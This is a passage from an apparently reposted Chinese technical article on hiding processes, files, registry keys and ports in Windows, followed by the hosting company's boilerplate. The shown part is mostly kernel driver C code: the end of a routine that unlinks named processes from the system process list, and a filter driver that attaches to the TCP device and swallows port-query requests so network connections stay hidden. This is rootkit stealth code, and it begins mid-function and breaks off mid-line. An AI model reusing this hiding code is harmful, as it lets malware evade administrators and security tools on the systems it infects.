隐藏任意进程、目录/文件、注册表、端口

作者佚名技术来源程序设计浏览发布时间 2012-06-30

　　　　　 }
　　　　　　　 else
　　　　　　　 {
　　　　　　　　 prev->NextEntryDelta = 0;
　　　　　　　 }
　　　　　　 }
　　　　　　 else
　　　　　　 {
　　　　　　　 if(curr->NextEntryDelta)
　　　　　　　 {
　　　　　　　　 (char *)SystemInformation += curr->NextEntryDelta;
　　　　　　　 }
　　　　　　　 else
　　　　　　　 {
　　　　　　　　 SystemInformation = NULL;
　　　　　　　 }
　　　　　　 }
　　　　　　 if(curr->NextEntryDelta)
　　　　　　　 ((char *)curr += curr->NextEntryDelta);
　　　　　　 else
　　　　　　 {
　　　　　　　 curr = NULL;break;
　　　　　　 }
　　　　　　 // 遍历链表
　　　　　　 found = 0;
　　　　　　 for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
　　　　　　 {
　　　　　　　 if (ptr->flag != PTR_HIDEPROC) continue ;
　　　　　　　 if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
　　　　　　　 {
　　　　　　　　 found = 1;
　　　　　　　 }
　　　　　　 }
　　　　　 }
　　　　 }
　　　　 if(curr != NULL)
　　　　 {
　　　　　 prev = curr;
　　　　　 if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
　　　　　 else curr = NULL;
　　　　 }
　　　 }
　　 }
　 }
　 return(rc);
}
//隐藏端口
PDEVICE_OBJECT m_TcpgetDevice;
PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;
Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];
RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");
//得到已有的设备指针
status = IoGetDeviceObjectPointer( &TcpDeviceName,FILE_ALL_ACCESS,&FileObject,&TcpDevice);
if(!NT_SUCCESS(status))
{
　 DbgPrint("IoGetDeviceObjectPointer error!\n");
　 return status;
}
DbgPrint("IoGetDeviceObjectPointer ok!\n");
// 建立设备
status = IoCreateDevice( DriverObject,sizeof(DEVICE_EXTENSION),NULL,
　　　　 FILE_DEVICE_UNKNOWN,0,FALSE,&FilterDevice);
if(!NT_SUCCESS(status))
{
　 return status;
}
// 加入设备
TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);
if(!TcpgetDevice)
{
　 IoDeleteDevice(FilterDevice);
　 DbgPrint("IoAttachDeviceToDeviceStack error!\n");
　 return STATUS_SUCCESS;
}
m_TcpgetDevice = TcpgetDevice;
// 加到过滤函数中处理
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
　 if((TcpDriver->MajorFunction[i]!=Empty)&&(DriverObject->MajorFunction[i]==Empty))
　 {
　　 DriverObject->MajorFunction[i] = PassThrough;
　 }
}
ObDereferenceObject(FileObject);
NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
　 NTSTATUS status;
　 PIO_STACK_LOCATION pIrpStack;
　 pIrpStack = IoGetCurrentIrpStackLocation( Irp );
//如是查询则完成 IRP
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
　 //这里可以近一步判断某个端口
　 Irp->IoStatus.Status=STATUS_SUCCESS;
　 IoCompleteRequest(Irp,IO_NO_INCREMENT);
　 return STATUS_SUCCESS;
}
//复制当前 IRP
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine( Irp,GenericCompletion,NULL,TRUE,TRUE,TRUE);
//传递
r

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

分享到：更多

你可能对下面的文章感兴趣

上一篇: 如何把一个网页存为一个单独的mht文件下一篇: 关于PE可执行文件的修改

关于隐藏任意进程、目录/文件、注册表、端口的所有评论

随机推荐